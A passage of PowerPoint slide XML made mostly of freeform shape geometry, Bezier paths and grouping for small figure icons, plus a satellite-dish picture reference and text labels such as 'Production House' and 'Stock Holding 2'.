                  <a:gd name="T10" fmla="*/ 3 w 90"/>
                  <a:gd name="T11" fmla="*/ 0 h 245"/>
                  <a:gd name="T12" fmla="*/ 3 w 90"/>
                  <a:gd name="T13" fmla="*/ 36 h 245"/>
                  <a:gd name="T14" fmla="*/ 2 w 90"/>
                  <a:gd name="T15" fmla="*/ 205 h 245"/>
                  <a:gd name="T16" fmla="*/ 44 w 90"/>
                  <a:gd name="T17" fmla="*/ 204 h 245"/>
                  <a:gd name="T18" fmla="*/ 45 w 90"/>
                  <a:gd name="T19" fmla="*/ 51 h 245"/>
                  <a:gd name="T20" fmla="*/ 36 w 90"/>
                  <a:gd name="T21" fmla="*/ 39 h 245"/>
                  <a:gd name="T22" fmla="*/ 45 w 90"/>
                  <a:gd name="T23" fmla="*/ 51 h 245"/>
                  <a:gd name="T24" fmla="*/ 44 w 90"/>
                  <a:gd name="T25" fmla="*/ 204 h 245"/>
                  <a:gd name="T26" fmla="*/ 44 w 90"/>
                  <a:gd name="T27" fmla="*/ 211 h 245"/>
                  <a:gd name="T28" fmla="*/ 88 w 90"/>
                  <a:gd name="T29" fmla="*/ 218 h 245"/>
                  <a:gd name="T30" fmla="*/ 89 w 90"/>
                  <a:gd name="T31" fmla="*/ 156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0" h="245">
                    <a:moveTo>
                      <a:pt x="89" y="156"/>
                    </a:move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3" y="170"/>
                      <a:pt x="46" y="55"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="36" y="46"/>
                      <a:pt x="36" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="46"/>
                      <a:pt x="45" y="47"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="55"/>
                      <a:pt x="43" y="170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tx1">
                      <a:gamma/>
                      <a:tint val="74118"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1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5" name="Freeform 937"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3736" y="1118"/>
                <a:ext cx="266" cy="310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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tx1">
                      <a:gamma/>
                      <a:tint val="74118"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1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6" name="Freeform 938"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3822" y="1101"/>
                <a:ext cx="88" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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7" name="Oval 939"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3810" y="1032"/>
                <a:ext cx="106" cy="105"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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918" name="Group 1543"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4163765" y="3123119"/>
              <a:ext cx="357948" cy="342930"/>
              <a:chOff x="4590" y="1312"/>
              <a:chExt cx="286" cy="274"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="919" name="Freeform 1544"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4590" y="1312"/>
                <a:ext cx="286" cy="274"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T1" fmla="*/ 362 h 1285"/>
                  <a:gd name="T2" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 0 w 1342"/>
                  <a:gd name="T5" fmla="*/ 924 h 1285"/>
                  <a:gd name="T6" fmla="*/ 0 w 1342"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T9" fmla="*/ 362 h 1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2" h="1285">
                    <a:moveTo>
                      <a:pt x="1342" y="362"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1342" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="36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0" name="Freeform 1545"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4658" y="1388"/>
                <a:ext cx="122" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 170 w 361"/>
                  <a:gd name="T1" fmla="*/ 102 h 242"/>
                  <a:gd name="T2" fmla="*/ 148 w 361"/>
                  <a:gd name="T3" fmla="*/ 63 h 242"/>
                  <a:gd name="T4" fmla="*/ 30 w 361"/>
                  <a:gd name="T5" fmla="*/ 23 h 242"/>
                  <a:gd name="T6" fmla="*/ 37 w 361"/>
                  <a:gd name="T7" fmla="*/ 147 h 242"/>
                  <a:gd name="T8" fmla="*/ 155 w 361"/>
                  <a:gd name="T9" fmla="*/ 187 h 242"/>
                  <a:gd name="T10" fmla="*/ 176 w 361"/>
                  <a:gd name="T11" fmla="*/ 143 h 242"/>
                  <a:gd name="T12" fmla="*/ 292 w 361"/>
                  <a:gd name="T13" fmla="*/ 174 h 242"/>
                  <a:gd name="T14" fmla="*/ 292 w 361"/>
                  <a:gd name="T15" fmla="*/ 223 h 242"/>
                  <a:gd name="T16" fmla="*/ 361 w 361"/>
                  <a:gd name="T17" fmla="*/ 242 h 242"/>
                  <a:gd name="T18" fmla="*/ 361 w 361"/>
                  <a:gd name="T19" fmla="*/ 154 h 242"/>
                  <a:gd name="T20" fmla="*/ 170 w 361"/>
                  <a:gd name="T21" fmla="*/ 10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1" h="242">
                    <a:moveTo>
                      <a:pt x="170" y="102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="89"/>
                      <a:pt x="158" y="75"/>
                      <a:pt x="148" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="30" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="47"/>
                      <a:pt x="2" y="102"/>
                      <a:pt x="37" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="193"/>
                      <a:pt x="124" y="210"/>
                      <a:pt x="155" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="177"/>
                      <a:pt x="175" y="161"/>
                      <a:pt x="176" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="292" y="174"/>
                      <a:pt x="292" y="174"/>
                      <a:pt x="292" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="292" y="223"/>
                      <a:pt x="292" y="223"/>
                      <a:pt x="292" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="361" y="242"/>
                      <a:pt x="361" y="242"/>
                      <a:pt x="361" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="361" y="154"/>
                      <a:pt x="361" y="154"/>
                      <a:pt x="361" y="154"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="170" y="102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pic>
          <p:nvPicPr>
            <p:cNvPr id="921" name="Picture 6" descr="Y:\Web2.0 PNG Icons\Satellite Dish-2.png"/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15317" y="2439221"/>
              <a:ext cx="403263" cy="4156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" name="Text Box 907"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3932290" y="4065689"/>
              <a:ext cx="13289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Arial" charset="0"/>
                </a:rPr>
                <a:t>Production House</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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923" name="Rectangle 922"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2390937" y="3683647"/>
              <a:ext cx="1177053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Stock Holding 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="924" name="Group 2893"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3066750" y="3029042"/>
              <a:ext cx="187325" cy="490537"/>
              <a:chOff x="1234" y="-3162"/>
              <a:chExt cx="416" cy="1112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="925" name="Freeform 2894"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1338" y="-2654"/>
                <a:ext cx="215" cy="604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 91"/>
                  <a:gd name="T1" fmla="*/ 2 h 256"/>
                  <a:gd name="T2" fmla="*/ 80 w 91"/>
                  <a:gd name="T3" fmla="*/ 2 h 256"/>
                  <a:gd name="T4" fmla="*/ 4 w 91"/>
                  <a:gd name="T5" fmla="*/ 0 h 256"/>
                  <a:gd name="T6" fmla="*/ 0 w 91"/>
                  <a:gd name="T7" fmla="*/ 29 h 256"/>
                  <a:gd name="T8" fmla="*/ 11 w 91"/>
                  <a:gd name="T9" fmla="*/ 216 h 256"/>
                  <a:gd name="T10" fmla="*/ 44 w 91"/>
                  <a:gd name="T11" fmla="*/ 215 h 256"/>
                  <a:gd name="T12" fmla="*/ 42 w 91"/>
                  <a:gd name="T13" fmla="*/ 54 h 256"/>
                  <a:gd name="T14" fmla="*/ 33 w 91"/>
                  <a:gd name="T15" fmla="*/ 42 h 256"/>
                  <a:gd name="T16" fmla="*/ 42 w 91"/>
                  <a:gd name="T17" fmla="*/ 54 h 256"/>
                  <a:gd name="T18" fmla="*/ 44 w 91"/>
                  <a:gd name="T19" fmla="*/ 215 h 256"/>
                  <a:gd name="T20" fmla="*/ 44 w 91"/>
                  <a:gd name="T21" fmla="*/ 222 h 256"/>
                  <a:gd name="T22" fmla="*/ 81 w 91"/>
                  <a:gd name="T23" fmla="*/ 229 h 256"/>
                  <a:gd name="T24" fmla="*/ 86 w 91"/>
                  <a:gd name="T25" fmla="*/ 52 h 256"/>
                  <a:gd name="T26" fmla="*/ 80 w 91"/>
                  <a:gd name="T27" fmla="*/ 2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1" h="256">
                    <a:moveTo>
                      <a:pt x="80" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="3"/>
                      <a:pt x="80" y="2"/>
                      <a:pt x="80" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="13"/>
                      <a:pt x="3" y="5"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="48"/>
                      <a:pt x="11" y="129"/>
                      <a:pt x="11" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="239"/>
                      <a:pt x="44" y="235"/>
                      <a:pt x="44" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="181"/>
                      <a:pt x="43" y="58"/>
                      <a:pt x="42" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="50"/>
                      <a:pt x="33" y="49"/>
                      <a:pt x="33" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="49"/>
                      <a:pt x="41" y="50"/>
                      <a:pt x="42" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="58"/>
                      <a:pt x="43" y="181"/>
                      <a:pt x="44" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="217"/>
                      <a:pt x="44" y="222"/>
                      <a:pt x="44" y="222"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="256"/>
                      <a:pt x="81" y="246"/>
                      <a:pt x="81" y="229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="161"/>
                      <a:pt x="83" y="67"/>
                      <a:pt x="86" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="27"/>
                      <a:pt x="83" y="5"/>
                      <a:pt x="8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6" name="Freeform 2895"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1234" y="-3011"/>
                <a:ext cx="416" cy="510"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 176"/>
                  <a:gd name="T1" fmla="*/ 192 h 216"/>
                  <a:gd name="T2" fmla="*/ 151 w 176"/>
                  <a:gd name="T3" fmla="*/ 44 h 216"/>
                  <a:gd name="T4" fmla="*/ 124 w 176"/>
                  <a:gd name="T5" fmla="*/ 19 h 216"/>
                  <a:gd name="T6" fmla="*/ 91 w 176"/>
                  <a:gd name="T7" fmla="*/ 10 h 216"/>
                  <a:gd name="T8" fmla="*/ 61 w 176"/>
                  <a:gd name="T9" fmla="*/ 2 h 216"/>
                  <a:gd name="T10" fmla="*/ 31 w 176"/>
                  <a:gd name="T11" fmla="*/ 12 h 216"/>
                  <a:gd name="T12" fmla="*/ 4 w 176"/>
                  <a:gd name="T13" fmla="*/ 157 h 216"/>
                  <a:gd name="T14" fmla="*/ 26 w 176"/>
                  <a:gd name="T15" fmla="*/ 165 h 216"/>
                  <a:gd name="T16" fmla="*/ 41 w 176"/>
                  <a:gd name="T17" fmla="*/ 70 h 216"/>
                  <a:gd name="T18" fmla="*/ 48 w 176"/>
                  <a:gd name="T19" fmla="*/ 85 h 216"/>
                  <a:gd name="T20" fmla="*/ 48 w 176"/>
                  <a:gd name="T21" fmla="*/ 151 h 216"/>
                  <a:gd name="T22" fmla="*/ 57 w 176"/>
                  <a:gd name="T23" fmla="*/ 161 h 216"/>
                  <a:gd name="T24" fmla="*/ 102 w 176"/>
                  <a:gd name="T25" fmla="*/ 173 h 216"/>
                  <a:gd name="T26" fmla="*/ 124 w 176"/>
                  <a:gd name="T27" fmla="*/ 153 h 216"/>
                  <a:gd name="T28" fmla="*/ 126 w 176"/>
                  <a:gd name="T29" fmla="*/ 67 h 216"/>
                  <a:gd name="T30" fmla="*/ 128 w 176"/>
                  <a:gd name="T31" fmla="*/ 85 h 216"/>
                  <a:gd name="T32" fmla="*/ 150 w 176"/>
                  <a:gd name="T33" fmla="*/ 201 h 216"/>
                  <a:gd name="T34" fmla="*/ 171 w 176"/>
                  <a:gd name="T35" fmla="*/ 192 h 216"/>
                  <a:gd name="T36" fmla="*/ 43 w 176"/>
                  <a:gd name="T37" fmla="*/ 56 h 216"/>
                  <a:gd name="T38" fmla="*/ 45 w 176"/>
                  <a:gd name="T39" fmla="*/ 45 h 216"/>
                  <a:gd name="T40" fmla="*/ 44 w 176"/>
                  <a:gd name="T41" fmla="*/ 55 h 216"/>
                  <a:gd name="T42" fmla="*/ 44 w 176"/>
                  <a:gd name="T43" fmla="*/ 54 h 216"/>
                  <a:gd name="T44" fmla="*/ 43 w 176"/>
                  <a:gd name="T45" fmla="*/ 5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6" h="216">
                    <a:moveTo>
                      <a:pt x="171" y="192"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="171"/>
                      <a:pt x="153" y="62"/>
                      <a:pt x="151" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="27"/>
                      <a:pt x="132" y="22"/>
                      <a:pt x="124" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="16"/>
                      <a:pt x="104" y="14"/>
                      <a:pt x="91" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="7"/>
                      <a:pt x="70" y="4"/>
                      <a:pt x="61" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="0"/>
                      <a:pt x="34" y="4"/>
                      <a:pt x="31" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="8" y="136"/>
                      <a:pt x="4" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="176"/>
                      <a:pt x="21" y="180"/>
                      <a:pt x="26" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="159"/>
                      <a:pt x="36" y="103"/>
                      <a:pt x="41" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="76"/>
                      <a:pt x="43" y="81"/>
                      <a:pt x="48" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="100"/>
                      <a:pt x="53" y="119"/>
                      <a:pt x="48" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="156"/>
                      <a:pt x="51" y="161"/>
                      <a:pt x="57" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="164"/>
                      <a:pt x="95" y="171"/>
                      <a:pt x="102" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="174"/>
                      <a:pt x="129" y="162"/>
                      <a:pt x="124" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="132"/>
                      <a:pt x="124" y="79"/>
                      <a:pt x="126" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="67"/>
                      <a:pt x="128" y="79"/>
                      <a:pt x="128" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="107"/>
                      <a:pt x="139" y="147"/>
                      <a:pt x="150" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="216"/>
                      <a:pt x="176" y="215"/>
                      <a:pt x="171" y="192"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="43" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="47"/>
                      <a:pt x="45" y="43"/>
                      <a:pt x="45" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="48"/>
                      <a:pt x="44" y="52"/>
                      <a:pt x="44" y="55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3" y="55"/>
                      <a:pt x="43" y="55"/>
                      <a:pt x="43" y="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7" name="Freeform 2896"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1281" y="-3009"/>
                <a:ext cx="324" cy="409"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 137"/>
                  <a:gd name="T1" fmla="*/ 3 h 173"/>
                  <a:gd name="T2" fmla="*/ 11 w 137"/>
                  <a:gd name="T3" fmla="*/ 11 h 173"/>
                  <a:gd name="T4" fmla="*/ 0 w 137"/>
                  <a:gd name="T5" fmla="*/ 68 h 173"/>
                  <a:gd name="T6" fmla="*/ 20 w 137"/>
                  <a:gd name="T7" fmla="*/ 75 h 173"/>
                  <a:gd name="T8" fmla="*/ 21 w 137"/>
                  <a:gd name="T9" fmla="*/ 69 h 173"/>
                  <a:gd name="T10" fmla="*/ 28 w 137"/>
                  <a:gd name="T11" fmla="*/ 84 h 173"/>
                  <a:gd name="T12" fmla="*/ 28 w 137"/>
                  <a:gd name="T13" fmla="*/ 150 h 173"/>
                  <a:gd name="T14" fmla="*/ 37 w 137"/>
                  <a:gd name="T15" fmla="*/ 160 h 173"/>
                  <a:gd name="T16" fmla="*/ 82 w 137"/>
                  <a:gd name="T17" fmla="*/ 172 h 173"/>
                  <a:gd name="T18" fmla="*/ 104 w 137"/>
                  <a:gd name="T19" fmla="*/ 152 h 173"/>
                  <a:gd name="T20" fmla="*/ 106 w 137"/>
                  <a:gd name="T21" fmla="*/ 66 h 173"/>
                  <a:gd name="T22" fmla="*/ 108 w 137"/>
                  <a:gd name="T23" fmla="*/ 84 h 173"/>
                  <a:gd name="T24" fmla="*/ 110 w 137"/>
                  <a:gd name="T25" fmla="*/ 92 h 173"/>
                  <a:gd name="T26" fmla="*/ 137 w 137"/>
                  <a:gd name="T27" fmla="*/ 88 h 173"/>
                  <a:gd name="T28" fmla="*/ 131 w 137"/>
                  <a:gd name="T29" fmla="*/ 43 h 173"/>
                  <a:gd name="T30" fmla="*/ 104 w 137"/>
                  <a:gd name="T31" fmla="*/ 18 h 173"/>
                  <a:gd name="T32" fmla="*/ 71 w 137"/>
                  <a:gd name="T33" fmla="*/ 9 h 173"/>
                  <a:gd name="T34" fmla="*/ 41 w 137"/>
                  <a:gd name="T35" fmla="*/ 1 h 173"/>
                  <a:gd name="T36" fmla="*/ 23 w 137"/>
                  <a:gd name="T37" fmla="*/ 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7" h="173">
                    <a:moveTo>
                      <a:pt x="23" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="4"/>
                      <a:pt x="12" y="7"/>
                      <a:pt x="11" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="13"/>
                      <a:pt x="5" y="39"/>
                      <a:pt x="0" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="72"/>
                      <a:pt x="15" y="79"/>
                      <a:pt x="20" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="73"/>
                      <a:pt x="21" y="71"/>
                      <a:pt x="21" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="75"/>
                      <a:pt x="23" y="80"/>
                      <a:pt x="28" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="99"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="28" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="155"/>
                      <a:pt x="31" y="160"/>
                      <a:pt x="37" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="163"/>
                      <a:pt x="75" y="170"/>
                      <a:pt x="82" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="173"/>
                      <a:pt x="109" y="161"/>
                      <a:pt x="104" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="131"/>
                      <a:pt x="104" y="78"/>
                      <a:pt x="106" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="66"/>
                      <a:pt x="108" y="78"/>
                      <a:pt x="108" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="87"/>
                      <a:pt x="109" y="89"/>
                      <a:pt x="110" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="95"/>
                      <a:pt x="132" y="92"/>
                      <a:pt x="137" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="67"/>
                      <a:pt x="132" y="50"/>
                      <a:pt x="131" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="26"/>
                      <a:pt x="112" y="21"/>
                      <a:pt x="104" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="15"/>
                      <a:pt x="84" y="13"/>
                      <a:pt x="71" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="6"/>
                      <a:pt x="50" y="3"/>
                      <a:pt x="41" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="29" y="1"/>
                      <a:pt x="23" y="3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8" name="Freeform 2897"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1281" y="-3009"/>
                <a:ext cx="324" cy="409"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
